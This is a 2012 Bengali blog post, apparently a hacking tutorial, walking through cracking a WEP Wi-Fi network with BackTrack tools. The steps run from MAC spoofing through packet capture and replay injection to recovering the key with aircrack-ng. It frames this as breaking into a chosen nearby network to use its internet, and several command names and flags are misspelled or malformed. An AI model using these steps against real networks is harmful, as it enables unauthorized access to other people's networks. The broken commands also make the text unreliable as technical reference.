Tuesday, August 21, 2012

BackTrack ব্যবহার করে Wifi হ্যাকিং

BackTrack এর মাধ্যমে ওয়াইফাই হ্যাক করার জন্য প্রথমে BackTrack এ লগিন করে Terminal ওপেন করে লিখুন ঃ
airmon-ng


আপনার Wirless Card এর নাম দেখতে পাবেন । ধরি এখানে Wirless Card এর নাম পেলাম wlan0 । তাই পরবর্তী ধাপ গুলোতে এই নামই আমরা ব্যবহার করব ।
এবার terminal এ লিখুন ঃ
airmon-ng stop wlan0 [enter] macchanger --mc00:11:22:33:44:55 wlan0
আপনার Wirless card এর ম্যাক আইডি পরিবর্তিত হয়ে 00:11:22:33:44:55 এই ফেক ম্যাক আইডিটি ধারন করবে ।
এখন Terminal এ লিখুন ঃ
airmon-ng start wlan0 [enter] airdump-ng wlan0
আপনার range এ থাকা সব ওয়াইফাই নেটওয়ার্ক এর দেখতে পাবেন । আপনার কাঙ্ক্ষিত নেটওয়ার্ক অর্থাৎ যেটি আপনি হ্যাক করতে চান সেটি পেয়ে গেলে Ctrl+C চেপে Scaning বন্ধ করুন । যে নেটওয়ার্কটি হ্যাক করবেন তার BSSID এবং channel মনে রাখুন ।
এরপর Terminal এ লিখুন ঃ
airdump-ng -c channel -w wephack --BSSID wlan0 [enter]
এখন এই উইন্ডোটি ওপেন রেখে আরেকটি Terminal ওপেন করুন এবং লিখুন ঃ
airplay-ng -1 0 -a BSSID -h 00:11:22:33:44:55 wlan0 [enter] airplay-ng -3 -b BSSID -h 00:11:22:33:44:55 wlan0 [enter]
এবার আগের উইন্ডোতে ফিরে যান , একটি সংখ্যা দেখতে পাবেন । এটি হচ্ছে আপনার কাঙ্ক্ষিত Wirless Network এর Wep key । এখন এটিকে Crack করতে নতুন একটি Terminal window ওপেন করুন এবং লিখুন ঃ aircrack-ng -b BSSID wephack-01.cap
এবার নেটওয়ার্কটির Cracked key দেখতে পাবেন । এটি দিয়ে ওই ওয়াইফাই নেটওয়ার্কে লগিন করুন এবং ইন্টারনেট ব্যবহার করুন । :D

1 comments:

  1. Vai blacktrack download link ta dile valo hoto ??

    ReplyDelete